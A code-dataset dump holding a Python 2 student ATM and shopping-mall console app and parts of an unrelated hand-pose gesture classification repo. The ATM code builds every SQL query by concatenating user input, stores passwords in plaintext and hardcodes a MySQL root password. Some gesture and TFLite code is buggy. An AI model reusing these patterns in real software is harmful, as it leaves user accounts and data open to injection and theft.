"src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding=utf-8 -*-\n\nfrom config import setting\nfrom apis import tab\nimport sys,os\nfrom core import atm,register,shopping,manager\n\n\ndef main():\n #启动出账单和计息程序\n global shopping_cart\n if len(os.popen('ps -ef|grep auto_calc.py|grep -v grep').readlines()) == 0:\n os.system('/usr/local/python2.7/bin/python /root/s12/day05/auto_calc.py &')\n #主程序\n while True:\n print 30*'#','\\033[35m欢迎您登陆ATM和购物商城!\\033[0m',30*'#'\n print 11*'#',\"\\033[35m如果您有信用卡请选择'1'或2进入ATM或购物商城菜单,如果你还没有账号请选择'3'申请账号!\\033[0m\",11*'#'\n print 86*'#'\n print '''\n 1 ATM 2 购物商城\n 3 申请信用卡 4 管理员界面\n '''\n print \"\\033[35m如果你退出请按'5'!\\033[0m\"\n num_input = raw_input(\"\\033[35m请输入您想要的选项:\\033[0m\")\n if num_input == '1':\n atm.bank()\n elif num_input == '2':\n shopping.shops()\n elif num_input == '3':\n print(\"现在开始进行信用卡申请流程!\")\n register.register()\n elif num_input == '4':\n manager.root_manager()\n elif num_input == '5':\n sys.exit(\"GOODBye!\")\n else:\n print \"\\033[34m###################请输入 1 or 2 or 3 or 4 ####################\\033[0m\"\n\n\nif __name__ == \"__main__\":\n main()" }, { "alpha_fraction": 0.45225101709365845, "alphanum_fraction": 0.4645293354988098, "avg_line_length": 46.30644989013672, "blob_id": "104d4dd17401e366dcf9ce195c6915bbc5708820", "content_id": "bbbb9f7d49f9b0225e7b959fbbbcb9dbdce892ac", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3168, "license_type": "no_license", "max_line_length": 134, "num_lines": 62, "path": "/auto_calc.py", "repo_name": "zhulh200868/day05", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding=utf-8 -*-\n\nfrom config import setting\nimport time\nfrom apis import mysql,sendemail\n\n\ndef auto_bill():\n while True:\n #出账单功能,当天数等22的时候出账单\n if (time.ctime()).split(' ')[2] == '22':\n sql_cmd = \"select name from user\" + \";\"\n ret_value = mysql.mysql(sql_cmd,'select',mode=2)\n name_list=ret_value.strip().split(\" \")\n for i in name_list:\n strings='date' + '\\t\\t' + 'name' + '\\t\\t' + 'act' + '\\t\\t' + 'business' + '\\t\\t' + 'price' + '\\t\\t' + 'balance' + '\\n'\n with open('log.txt','r') as file:\n for j in file:\n # print j.split()[2]\n if i == j.split()[2]:\n strings += j\n #将账单通过邮件发送\n sendemail.s_email(strings)\n #当到达11号的时候首先去判断是否已经还款,如果还没有的话将str_interest字段标记为1,说明还未还款\n if int((time.ctime()).split(' ')[2]) == 11:\n sql_cmd = \"select name from user\" + \";\"\n ret_value = mysql.mysql(sql_cmd,'select',mode=2)\n name_list=ret_value.strip().split(\" \")\n for i in name_list:\n sql_cmd = \"select money from user where name = \" + \"'\" + i + \"'\" + \";\"\n money = mysql.mysql(sql_cmd,'select')\n sql_cmd = \"select salary from user where name = \" + \"'\" + i + \"'\" + \";\"\n salary = mysql.mysql(sql_cmd,'select')\n if float(salary) > float(money):\n sql_cmd = \"update user set str_interest = \" + \"where name = \" + \"'\" + i + \"'\" + \";\"\n mysql.mysql(sql_cmd,'update')\n #计息功能,当超过10号的时候就开始计息,直到全部还款完毕!\n if int((time.ctime()).split(' ')[2]) > 10:\n #将str_interest=1的人取出来,说明他们是还没还款的\n sql_cmd = \"select name from user where str_interest='1'\" + \";\"\n ret_value = mysql.mysql(sql_cmd,'select',mode=2)\n name_list=ret_value.strip().split(\" \")\n for i in name_list:\n sql_cmd = \"select money from user where name = \" + \"'\" + i + \"'\" + \";\"\n money = mysql.mysql(sql_cmd,'select')\n sql_cmd = \"select salary from user where name = \" + \"'\" + i + \"'\" + \";\"\n salary = mysql.mysql(sql_cmd,'select')\n if float(salary) > float(money):\n money = (float(salary) - float(money))*0.0005\n sql_cmd = \"select interest from user where name = \" + \"'\" + i + \"'\" + \";\"\n ret_value = mysql.mysql(sql_cmd,'select')\n ret_value = money + float(ret_value)\n sql_cmd = \"update user set interest = \" +\"'\"+ str(round(ret_value,2))+ \"'\" + \"where name = \" + \"'\" + i + \"'\" + \";\"\n mysql.mysql(sql_cmd,'update')\n #为了保证一天只执行一次\n for i in range(1440):\n time.sleep(60)\n\n\nif __name__ == \"__main__\":\n auto_bill()" }, { "alpha_fraction": 0.38683584332466125, "alphanum_fraction": 0.4174046218395233, "avg_line_length": 44, "blob_id": "a66676f06c5b0bc37e01733d765af3909686293e", "content_id": "d4701176a5bc57b1218d2cd72185028596e6a85f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 13122, "license_type": "no_license", "max_line_length": 145, "num_lines": 261, "path": "/core/atm.py", "repo_name": "zhulh200868/day05", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding=utf-8 -*-\n\nfrom config import setting\nfrom login import login\nfrom apis import mysql,logger,passwd_getpass\nimport sys\n\ndef display_money():\n sql_cmd = \"select money from user where name = \" + \"'\" + names + \"'\" + \";\"\t#查找现余的额度\n ret_value = mysql.mysql(sql_cmd,'select')\n print \"\\033[35m您的信用余额为%s \\033[0m\" % ret_value\n\ndef take_money():\n num = 0\n while True:\n if num == 3:\n print(\"您输入错误已经达到3次!\")\n break\n input_num = raw_input('\\033[31m请输入您需要提现的额数:\\033[0m').strip()\n sql_cmd = \"select money from user where name = \" + \"'\" + names + \"'\" + \";\"\n ret_value = mysql.mysql(sql_cmd,'select')\n if input_num.isdigit():\n if int(input_num)*1.05 > float(ret_value):\n print \"您输入的额数大于您的余额,不能进行提现,请重新输入,谢谢!\"\n else:\n ret_value = float(ret_value) - int(input_num)*1.05\n sql_cmd = \"update user set money = \" +\"'\"+ str(round(ret_value,2))+ \"'\" + \"where name = \" + \"'\" + names + \"'\" + \";\"\n mysql.mysql(sql_cmd,'update')\n print \"您提现的额数为:%s元,本次提现成功,并收取%s元的手续费!\" %(str(input_num),str(int(input_num)*0.05))\n print(\"你现在的余额为:%s\" %str(round(ret_value,2)))\n break\n else:\n num += 1\n print(\"您输入的金额有误,请重新输入!\")\n\ndef transfer_money():\n num = 0\n while True:\n if num == 3:\n print(\"您输入错误已经达到3次!\")\n break\n input_name = raw_input('\\033[31m请输入您想转给谁?:\\033[0m').strip()\n input_num = raw_input('\\033[31m请输入您转账的金额:\\033[0m').strip()\n sql_cmd = \"select ifnull((select name from user where name = \" + \"'\" + input_name + \"'\" \"),0000);\"\n ret_value = mysql.mysql(sql_cmd,'select')\n if ret_value == input_name and input_name != names:\n sql_cmd = \"select money from user where name = \" + \"'\" + names + \"'\" + \";\"\n ret_value = mysql.mysql(sql_cmd,'select')\n if input_num.isdigit():\n if int(input_num) > float(ret_value):\n print \"您输入的额数大于您的余额,不能进行提现,请重新输入,谢谢!\"\n else:\n ret_value = float(ret_value) - int(input_num)\n sql_cmd = \"update user set money = \" +\"'\"+ str(round(ret_value,2))+ \"'\" + \"where name = \" + \"'\" + names + \"'\" + \";\"\n mysql.mysql(sql_cmd,'update')\n sql_cmd = \"select money from user where name = \" + \"'\" + input_name + \"'\" + \";\"\n ret_value = mysql.mysql(sql_cmd,'select')\n ret_value = float(ret_value) + int(input_num)\n sql_cmd = \"update user set money = \" +\"'\"+ str(round(ret_value,2))+ \"'\" + \"where name = \" + \"'\" + input_name + \"'\" + \";\"\n mysql.mysql(sql_cmd,'update')\n print(\"本次转账成功!因为是本行内转账不收取任何手续费!\")\n break\n else:\n num += 1\n print(\"您输入的金额有误,请重新输入!\")\n else:\n num += 1\n print(\"您输入的账号有误或者不能转账给自己,请重新输入!\")\n\ndef repay_money():\n while True:\n print 100*'#'\n print '''\n 1 显示应还款金额 2 还款\n 3 返回上级菜单 4 退出\n '''\n print 100*'#'\n input_num = raw_input('\\033[31m请您选择[1, 2, 3, 4]: \\033[0m').strip()\n if input_num == \"1\":\n sql_cmd = \"select money from user where name = \" + \"'\" + names + \"'\" + \";\"\n money = mysql.mysql(sql_cmd,'select')\n sql_cmd = \"select salary from user where name = \" + \"'\" + names + \"'\" + \";\"\n salary = mysql.mysql(sql_cmd,'select')\n sql_cmd = \"select interest from user where name = \" + \"'\" + names + \"'\" + \";\"\n interest = mysql.mysql(sql_cmd,'select')\n if float(money) >= int(salary):\n print '\\033[35m您无需还款,目前您的余额为:%s\\033[0m' %money\n else:\n print '\\033[35m您需要还款的金额为:%s,其中利息为%s.\\033[0m' % (str(int(salary) - float(money)+float(interest)),str(interest))\n elif input_num == \"2\":\n sql_cmd = \"select money from user where name = \" + \"'\" + names + \"'\" + \";\"\n money = mysql.mysql(sql_cmd,'select')\n print \"\\033[35m 您现在信用卡的金额为 %s \\033[0m\" %money\n num = 0\n while True:\n if num == 3:\n print(\"您输入错误已经达到3次!\")\n break\n money_num = raw_input('\\033[31m请输入您要还款的金额:\\033[0m').strip()\n #判断输入的是否是数字\n if money_num.isdigit():\n sql_cmd = \"select interest from user where name = \" + \"'\" + names + \"'\" + \";\"\n interest = mysql.mysql(sql_cmd,'select')\n if int(money_num) > float(interest):\n new_money = float(money) + int(money_num) - float(interest)\n interest = \"0\"\n sql_cmd = \"update user set money = \" +\"'\"+ str(round(new_money,2))+ \"'\" + \"where name = \" + \"'\" + names + \"'\" + \";\"\n mysql.mysql(sql_cmd,'update')\n sql_cmd = \"update user set interest = \" +\"'\"+ str(interest)+ \"'\" + \"where name = \" + \"'\" + names + \"'\" + \";\"\n mysql.mysql(sql_cmd,'update')\n print \"\\033[35m 您本次还款成功! \\033[0m\"\n print \"\\033[35m 您现在信用的金额为 %s \\033[0m\" %str(round(new_money,2))\n sql_cmd = \"select salary from user where name = \" + \"'\" + names + \"'\" + \";\"\n salary = mysql.mysql(sql_cmd,'select')\n if float(new_money) >= int(salary):\n sql_cmd = \"update user set str_interest = '0'\" + \"where name = \" + \"'\" + names + \"'\" + \";\"\n mysql.mysql(sql_cmd,'update')\n else:\n interest = float(interest) - int(money_num)\n sql_cmd = \"update user set interest = \" +\"'\"+ str(round(interest,2))+ \"'\" + \"where name = \" + \"'\" + names + \"'\" + \";\"\n mysql.mysql(sql_cmd,'update')\n new_money = money\n if interest == 0:\n print \"您本次还款只还清了利息!\"\n else:\n print \"您本次还款只还了利息的%s,您还有%s利息要还!\" %(money_num,round(interest,2))\n break\n else:\n num += 1\n print('\\033[31m您输入的金额有误,请重新输入!\\033[0m')\n continue\n price = '+'+str(money_num)\n logger.record_log(names,'repay_money','----',price,new_money)\n elif input_num == \"3\":\n break\n elif input_num == \"4\":\n sys.exit(\"GOODBye!\")\n else:\n print \"\\033[34m###################请您输入 1 or 2 or 3 or 4####################\\033[0m\"\n\ndef change_passwd():\n #跳出第一层循环标识\n first_break = False\n while True:\n if first_break:\n break\n print 100*'#'\n print ' 1 修改密码 2 返回上级菜单 3 退出 \\n'\n print 100*'#'\n input_num = raw_input('\\033[31m请您选择[1, 2, 3]: \\033[0m').strip()\n if input_num == \"1\":\n #输入旧密码次数的标识\n second_count_flag = 0\n #跳出输入旧密码的循环标识\n second_break = False\n while True:\n if second_break:\n break\n #输入旧密码\n #old_passwd = getpass.getpass('\\033[31m请输入您的旧密码:\\033[0m').strip()\n print '\\033[31m请输入您的旧密码:\\033[0m',\n old_passwd = passwd_getpass.getpass(\"*\")\n # print old_passwd,passwd\n if old_passwd == passwd:\n #输入新密码两次不一致的次数\n third_count_flag = 0\n #输入新密码不符合规则的次数\n third_count_flags = 0\n third_break = False\n while True:\n if third_break:\n break\n # new_passwd1 = getpass.getpass('\\033[31m请您输入您的新密码:\\033[0m').strip()\n # new_passwd2 = getpass.getpass('\\033[31m请再次您输入您的新密码:\\033[0m').strip()\n print '\\033[31m请您输入您的新密码:\\033[0m',\n new_passwd1 = passwd_getpass.getpass(\"*\")\n print '\\033[31m请再次您输入您的新密码:\\033[0m',\n new_passwd2 = passwd_getpass.getpass(\"*\")\n if new_passwd1 == new_passwd2:\n if len(new_passwd2) > 6 and not new_passwd2.isdigit():\n print \"\\033[31m您修改的密码已经成功!\\033[0m\"\n sql_cmd = \"update user set password = \" + \"'\" + new_passwd2 + \"'\" + \"where name = \" + \"'\" + names + \"'\" + \";\"\n mysql.mysql(sql_cmd,'update')\n first_break = True\n second_break = True\n third_break = True\n else:\n third_count_flags += 1\n print \"您输入的密码不符合规则(需要输入6位以上的且有字母和数字组成)\"\n if third_count_flags == 3:\n print \"###############您输入的次数已经达到3次,请一会再修改!################\"\n second_break = True\n third_break = True\n\n else:\n third_count_flag += 1\n print \"###############您两次输入的密码不一致!################\"\n if third_count_flag == 3:\n print \"###############您输入的次数已经达到3次,请一会再修改!################\"\n print '\\n'\n second_break = True\n third_break = True\n else:\n second_count_flag += 1\n print \"#################您输入的密码是错误的!###################\"\n if second_count_flag == 3:\n print \"###############您设置的次数已经达到3次,请一会再修改!################\"\n print '\\n'\n second_break = True\n third_break = True\n elif input_num == \"2\":\n first_break = True\n elif input_num == \"3\":\n sys.exit(\"GOODBye!\")\n else:\n print \"\\033[34m###################请您输入 1 or 2 or 3####################\\033[0m\"\n\ndef decorate(func):\n def inner():\n is_login = login()\n if not is_login[0]:\n return None\n global names\n global passwd\n names=is_login[1]\n passwd=is_login[2]\n func()\n return inner\n\n@decorate\ndef bank():\n while True:\n print 100*'#'\n print '''\n 1 余额 2 提现\n 3 转账 4 还款\n 5 修改密码 6 退出\n '''\n print 100*'#'\n print \"\\033[35m如果你想返回上一级菜单请输入'7'!\\033[0m\"\n num_input = raw_input('\\033[31m请您选择[1, 2, 3, 4]: \\033[0m').strip()\n if num_input == '1':\n display_money()\n elif num_input == '2':\n take_money()\n elif num_input == '3':\n transfer_money()\n elif num_input == '4':\n repay_money()\n elif num_input == '5':\n change_passwd()\n elif num_input == '6':\n sys.exit(\"GOODBye!\")\n elif num_input == '7':\n break\n else:\n print \"\\033[34m###################请输入 1 or 2 or 3 or 4 or 5 or 6 ####################\\033[0m\"\n\nif __name__ == \"__main__\":\n bank()" }, { "alpha_fraction": 0.45943987369537354, "alphanum_fraction": 0.4741670787334442, "avg_line_length": 43.54838562011719, "blob_id": "a766478010127e0d571091d221850b18389bca68", "content_id": "3309e180f135a502d23e464f1ed4eaca24986490", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5194, "license_type": "no_license", "max_line_length": 135, "num_lines": 93, "path": "/core/login.py", "repo_name": "zhulh200868/day05", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding=utf-8 -*-\n\nfrom config import setting\nfrom apis import mysql,passwd_getpass,Caltimes\nimport sys,time\n\n#用户的账号和密码验证函数\ndef login():\n #输错密码的标识\n count_flag = 0\n #跳出循环的标识\n break_flag = False\n #因为下面有别的函数需要用到这两个值,所以设成了全局变量\n global names\n global passwd\n #try子块在这边有点鸡肋\n try:\n while True:\n #输入账号\n names = raw_input(\"\\033[31m首先您需要输入您的账号(退出请输入'q'):\\033[0m\").strip()\n #查询这个账号存不存在\n sql_cmd = \"select ifnull((select name from user where name = \" + \"'\" + names + \"'\" \"),0000);\"\n ret_value = mysql.mysql(sql_cmd,'select')\n #如果输入的账号是空的,就结束本次循环\n if names == '':\n print \"您输入账号是空,请再输入账号!\"\n continue\n elif names == 'q':\n is_login = False\n print \"GOODBye!\"\n break\n #如果输入的账号存在就执行下面的语句\n elif names == ret_value:\n #查询该账号status字段的信息\n sql_cmd = \"select status from user where name = \" + \"'\" + names + \"'\" + \";\"\t#查找该账号的状态\n status = mysql.mysql(sql_cmd,'select')\n #查询该账号的锁住时间\n sql_cmd = \"select lock_time from user where name = \" + \"'\" + names + \"'\" + \";\"\n lock_time = mysql.mysql(sql_cmd,'select')\n #计算出锁定时间和当前时间相差多少分钟\n minutes = Caltimes.Caltime(lock_time,time.strftime(\"%Y-%m-%d %H:%M:%S\",time.localtime()))/60\n #如果status为lock并且时间差值小于等于10分钟的话,就退出程序\n if status == 'lock' and minutes <= 10:\n sys.exit(\"您的账号处于锁定状态,需要再等待%s分钟以后就自动解锁!\" %(10 - minutes))\n #如果status为lock并且时间差值大于10分钟的话,就去修改status的值为unlock\n elif status == 'lock' and minutes > 10:\n sql_cmd = \"update user set status='unlock' where name = '\" + names + \"';\"\t#将status字段值更改为unlock\n mysql.mysql(sql_cmd,'update')\n #如果status为unlock的就执行下面的语句\n while True:\n # passwd = raw_input('\\033[31m请输入您的密码:\\033[0m').strip()\t#输入该账号的密码\n print \"\\033[31m请输入您的密码(退出请输入'q'):\\033[0m\",\n passwd = passwd_getpass.getpass(\"*\")\n # passwd = getpass.getpass(\"\\033[31m请输入您的密码(退出请输入'q'):\\033[0m\").strip()\t#输入该账号的密码\n #通过之前输入的names来查询它的passwd\n sql_cmd = \"select password from user where name = \" + \"'\" + names + \"'\" + \";\"\t#查找该账号在数据库中的值\n ret_value = mysql.mysql(sql_cmd,'select')\n #判断输入的密码和数据库中的密码是否相等,如果相等就将break_flag改成True,并跳出循环\n if passwd == 'q':\n is_login = False\n break_flag = True\n print \"GOODBye!\"\n break\n elif ret_value == passwd:\n break_flag = True\n is_login = True\n break\n else:\n #如果输入的密码错误就计数加1\n count_flag += 1\n print \"对不起,您输入的密码是错误的,您还有%s机会!\" %(3 - count_flag)\n #输错密码达到3次就锁住该账号\n if count_flag == 3:\n sql_cmd = \"update user set status='lock' where name = '\" + names + \"';\"\t\t#修改数据库中status字段的值\n mysql.mysql(sql_cmd,'update')\n lock_time = time.strftime(\"%Y-%m-%d %H:%M:%S\",time.localtime())\n sql_cmd = \"update user set lock_time='\" + lock_time +\"' where name = '\" + names + \"';\"\t#修改数据库中lock_time字段的值\n mysql.mysql(sql_cmd,'update')\n sys.exit(\"您的账号将被锁住,请等待10分钟以后自动解锁,谢谢!\")\n # is_login = False\n #判断是否要跳出整个循环\n if break_flag:\n break\n else:\n print \"您输入的账号不存在!\"\n #is_login = True\n ret_login = [is_login,names,passwd]\n return ret_login\n # except NameError:\n # print \"MySQL服务器还没有启动!\"\n except KeyboardInterrupt:\n print \"请不要打断我,我正在做重要的事情,谢谢!\"" }, { "alpha_fraction": 0.5476838946342468, "alphanum_fraction": 0.5858310461044312, "avg_line_length": 20.647058486938477, "blob_id": "6598b406380dfb027775eaa2deb15fc3e289013e", "content_id": "a63d38b8deaf0610467750427c77fd014e356c79", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 367, "license_type": "no_license", "max_line_length": 79, "num_lines": 17, "path": "/config/setting.py", "repo_name": "zhulh200868/day05", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding=utf-8 -*-\n\nimport sys,os\nbase_dir = '/'.join(os.path.abspath(os.path.dirname(__file__)).split(\"/\")[:-1])\nsys.path.append(base_dir)\n\nDATABASE = {\n \"engine\":\"mysql\",\n \"host\":\"localhost\",\n \"port\":3307,\n \"user\":\"root\",\n \"password\":\"123456\",\n \"unix_socket\":\"/tmp/mysql_3307.sock\",\n}\n\nlogfile_dir = \"/root/s12/day05\"" }, { "alpha_fraction": 0.4597359597682953, "alphanum_fraction": 0.499009907245636, "avg_line_length": 34.22093200683594, "blob_id": "2cc7ad72a945fbf8d3487dd746a000b7a54a17ee", "content_id": "3b57fb50b028b8e62e471f7571a03111505f642d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3418, "license_type": "no_license", "max_line_length": 123, "num_lines": 86, "path": "/core/manager.py", "repo_name": "zhulh200868/day05", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding=utf-8 -*-\n\nfrom config import setting\nfrom login import login\nfrom apis import mysql,logger,passwd_getpass\nfrom core import register\nimport sys,time\n\ndef add_account():\n register.register()\n\ndef change_salary():\n num = 0\n while True:\n if num == 3:\n print(\"您输入的错误已经达到3次!\")\n break\n num_input = raw_input(\"\\033[35m请输入您想要调整额度的账号:\\033[0m\")\n sql_cmd = \"select ifnull((select name from user where name = \" + \"'\" + num_input + \"'\" \"),0000);\"\n ret_value = mysql.mysql(sql_cmd,'select')\n if num_input == ret_value:\n sql_cmd = \"select salary from user where name = \" + \"'\" + num_input + \"'\" + \";\"\n salary = mysql.mysql(sql_cmd,'select')\n print \"目前%s账号的额度为:%s\" %(num_input,salary)\n money = raw_input(\"\\033[35m请输入您想要调整额度:\\033[0m\")\n if money.isdigit():\n sql_cmd = \"update user set salary = \" +\"'\"+ str(money)+ \"'\" + \"where name = \" + \"'\" + num_input + \"'\" + \";\"\n mysql.mysql(sql_cmd,'update')\n print('\\033[31m您调整的额度已成功!\\033[0m')\n break\n else:\n num += 1\n print('\\033[31m您输入的金额有误,请重新输入!\\033[0m')\n else:\n print \"您输入的账号不存在!\"\n\ndef lock_account():\n num_input = raw_input(\"\\033[35m请输入您想要冻结的账号:\\033[0m\")\n sql_cmd = \"select ifnull((select name from user where name = \" + \"'\" + num_input + \"'\" \"),0000);\"\n ret_value = mysql.mysql(sql_cmd,'select')\n if num_input == ret_value:\n sql_cmd = \"update user set status='lock' where name = '\" + ret_value + \"';\"\t\t#修改数据库中status字段的值\n mysql.mysql(sql_cmd,'update')\n lock_time = time.strftime(\"%Y-%m-%d %H:%M:%S\",time.localtime())\n sql_cmd = \"update user set lock_time='\" + lock_time +\"' where name = '\" + ret_value + \"';\"\t#修改数据库中lock_time字段的值\n mysql.mysql(sql_cmd,'update')\n print(\"您已经将%s账号冻结10分钟!\" %num_input)\n else:\n print \"您输入的账号不存在!\"\n\ndef decorate(func):\n def inner():\n is_login = login()\n if not is_login[0]:\n return None\n names=is_login[1]\n if names == 'root':\n func()\n else:\n print \"您不是管理员,不能进行登陆!\"\n return inner\n\n@decorate\ndef root_manager():\n while True:\n print 30*'#','\\033[35m欢迎您登陆管理员界面!\\033[0m',30*'#'\n print 86*'#'\n print '''\n 1 添加账号 2 用户额度\n 3 冻结账号 4 返回\n '''\n print \"\\033[35m如果你退出请按'5'!\\033[0m\"\n num_input = raw_input(\"\\033[35m请输入您想要的选项:\\033[0m\")\n if num_input == \"1\":\n add_account()\n elif num_input == \"2\":\n change_salary()\n elif num_input == \"3\":\n lock_account()\n elif num_input == \"4\":\n break\n elif num_input == \"5\":\n sys.exit(\"GOODBye!\")\n else:\n print \"\\033[34m###################请输入 1 or 2 or 3 or 4 or 5 ####################\\033[0m\"\n\n" }, { "alpha_fraction": 0.409531831741333, "alphanum_fraction": 0.4576128125190735, "avg_line_length": 39.20338821411133, "blob_id": "32b840502de2dc9592b018e3e44c09154e642001", "content_id": "b373dcc058a194ea36ecbf213944e1d78269b8e6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2695, "license_type": "no_license", "max_line_length": 167, "num_lines": 59, "path": "/core/register.py", "repo_name": "zhulh200868/day05", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding=utf-8 -*-\n\nfrom config import setting\nfrom apis import mysql,passwd_getpass\nimport random\n\n#账号注册\ndef register():\n first_break = False\n while True:\n if first_break:\n break\n #输入申请的账号\n user_name = raw_input(\"\\033[31m请输入账号名:\\033[0m\")\n sql_cmd = \"select ifnull((select name from user where name = \" + \"'\" + user_name + \"'\" \"),0000);\"\n ret_value = mysql.mysql(sql_cmd,'select')\n #如果输入的账号是空的,就结束本次循环\n if user_name == '':\n print \"\\033[31m您输入账号是空,请再输入账号!\\033[0m\"\n continue\n elif user_name == ret_value:\n print \"\\033[31m您输入账号已经存在!\\033[0m\"\n continue\n first_count_flags = 0\n second_count_flags = 0\n while True:\n print '\\033[31m请您输入您的密码:\\033[0m',\n new_passwd1 = passwd_getpass.getpass(\"*\")\n print '\\033[31m请再次您输入您的密码:\\033[0m',\n new_passwd2 = passwd_getpass.getpass(\"*\")\n if new_passwd1 == new_passwd2:\n if len(new_passwd2) > 6 and not new_passwd2.isdigit():\n salary = random.choice([10000,20000,30000,40000,50000])\n sql_cmd = \"insert into user(name,password,salary,money,status,lock_time,interest) values(\" +\\\n \"'\"+ user_name +\"',\" +\"'\" + new_passwd2 + \"',\"+ \"'\"+ str(salary) +\"',\"+\"'\"+ str(salary) +\"',\"+\"'unlock','2015-06-08 20:56:09','0')\" + \";\"\n mysql.mysql(sql_cmd,'insert')\n print \"\\033[31m您创建密码已经成功!并且您的信用卡已经申请成功,限额为%s \\033[0m\" %salary\n first_break = True\n break\n else:\n first_count_flags += 1\n print \"您输入的密码不符合规则(需要输入6位以上的且有字母和数字组成)\"\n if first_count_flags == 3:\n print \"###############你申请账号失败!################\"\n print '\\n'\n first_break = True\n break\n else:\n second_count_flags += 1\n print \"###############您两次输入的密码不一致!################\"\n if second_count_flags == 3:\n print \"################你申请账号失败!###############\"\n print '\\n'\n first_break = True\n break\n\nif __name__ == \"__main__\":\n register()" } ]
15
shreyas0906/Hand-pose-classification
https://github.com/shreyas0906/Hand-pose-classification
c060fc88aac5f1e82233560421bfbb6363e97e49
030e67bc60e42febe86f2eb0389758426ea8d0ea
8035b2fd27e59955e9e246f0bfca2ac152460155
refs/heads/main
2023-08-24T02:31:49.802166
2021-11-01T09:47:08
2021-11-01T09:47:08
414,220,036
2
0
null
null
null
null
null
[ { "alpha_fraction": 0.6956856846809387, "alphanum_fraction": 0.7080123424530029, "avg_line_length": 28.477272033691406, "blob_id": "f37b5f3f900c254e14d45e5cad00081c475614d5", "content_id": "33f35b39dac65bedc418783e410ebc76c22442f2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1298, "license_type": "no_license", "max_line_length": 100, "num_lines": 44, "path": "/misc/tflite_exp.py", "repo_name": "shreyas0906/Hand-pose-classification", "src_encoding": "UTF-8", "text": "import numpy as np\nfrom numpy.lib.shape_base import expand_dims\nimport tensorflow as tf\nimport cv2 \nimport mediapipe as mp \n\n# Load TFLite model and allocate tensors.\ninterpreter = tf.lite.Interpreter(model_path=\"../mediapipe_tflite_models/pose_landmark_full.tflite\")\ninterpreter.allocate_tensors()\n\n# Get input and output tensors.\ninput_details = interpreter.get_input_details()\noutput_details = interpreter.get_output_details()\n\nprint(f\"\\ninput_details: {input_details}\")\nprint(f\"\\noutput details: {output_details}\")\nprint(f\"\\n\")\n\nmp_drawing = mp.solutions.drawing_utils\nmp_hands = mp.solutions.hands\n\ncap = cv2.VideoCapture(0)\n\nwhile cap.isOpened():\n\n success, image = cap.read()\n image = image.astype(np.float32)\n image_width, image_height, _ = image.shape\n print(f\"image width: {image_width} and image height: {image_height}\")\n\n if not success:\n print(\"Ignoring empty camera frame.\")\n # If loading a video, use 'break' instead of 'continue'.\n continue\n \n image = cv2.resize(image, (255,255))\n image = np.expand_dims(image, axis=0)\n print(f\"image shape: {image.shape}\")\n interpreter.set_tensor(input_details[0]['index'], 1)\n interpreter.invoke()\n results = interpreter.get_tensor(output_details[0]['index'])\n print(results)\n\ncap.release()\n\n" }, { "alpha_fraction": 0.6450638175010681, "alphanum_fraction": 0.6474143862724304, "avg_line_length": 35.317073822021484, "blob_id": "6c8b9252f6938201cec33295d84aa6319b6ca323", "content_id": "91f8909b70d95b7ffe02330968c59685a9d2daf2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2978, "license_type": "no_license", "max_line_length": 151, "num_lines": 82, "path": "/utils/Gesture.py", "repo_name": "shreyas0906/Hand-pose-classification", "src_encoding": "UTF-8", "text": "from utils import Hand\nimport numpy as np \n\nclass Gesture(Hand):\n\n def __init__(self):\n super().__init__()\n # self.type = None # return the type of gesture given the landmarks.\n\n def is_ok(self):\n\n distance = np.linalg.norm(self.index_finger - self.thumb) * 100\n\n if 0.5 < distance < 3.0:\n return True\n return False\n\n def is_five(self):\n pass\n\n def is_four(self):\n \n index_finger_above_palm = self.is_point_above_palm_line(self.index_finger)\n middle_finger_above_palm = self.is_point_above_palm_line(self.middle_finger)\n ring_finger_above_palm = self.is_point_above_palm_line(self.ring_finger)\n pinky_finger_above_palm = self.is_point_above_palm_line(self.pinky_finger)\n thumb_finger_below_palm = self.is_point_above_plam_line(self.thumb)\n\n if index_finger_above_palm and middle_finger_above_palm and ring_finger_above_palm and pinky_finger_above_palm and not thumb_finger_below_palm:\n return True\n\n return False\n\n\n def is_three(self):\n index_finger_above_palm = self.is_point_above_palm_line(self.index_finger)\n middle_finger_above_palm = self.is_point_above_palm_line(self.middle_finger)\n ring_finger_above_palm = self.is_point_above_palm_line(self.ring_finger)\n thumb_ip = self.is_point_above_palm_line(self.thumb_ip)\n pinky_finger = self.is_point_above_palm_line(self.pinky_finger)\n\n if (index_finger_above_palm and middle_finger_above_palm and ring_finger_above_palm) and not (thumb_ip and pinky_finger):\n return True\n \n return False\n\n\n def is_two(self):\n index_finger_above_palm = self.is_point_above_palm_line(self.index_finger)\n middle_finger_above_palm = self.is_point_above_palm_line(self.middle_finger)\n ring_finger_above_palm = self.is_point_above_palm_line(self.ring_finger)\n thumb_ip = self.is_point_above_palm_line(self.thumb_ip)\n pinky_finger = self.is_point_above_palm_line(self.pinky_finger)\n\n if (index_finger_above_palm and middle_finger_above_palm) and not (ring_finger_above_palm and thumb_ip and pinky_finger):\n return True\n \n return False\n\n def is_hang(self):\n index_finger_above_palm = self.is_point_above_palm_line(self.index_finger)\n middle_finger_above_palm = self.is_point_above_palm_line(self.middle_finger)\n ring_finger_above_palm = self.is_point_above_palm_line(self.ring_finger)\n thumb_ip = self.is_point_above_palm_line(self.thumb_ip)\n pinky_finger = self.is_point_above_palm_line(self.pinky_finger)\n \n if not (index_finger_above_palm and middle_finger_above_palm and ring_finger_above_palm and thumb_ip) and pinky_finger:\n return True\n \n return False\n\n def is_heavy(self):\n pass\n\n def is_L(self):\n pass\n\n def is_C(self):\n pass\n\n def is_palm(self):\n pass\n" }, 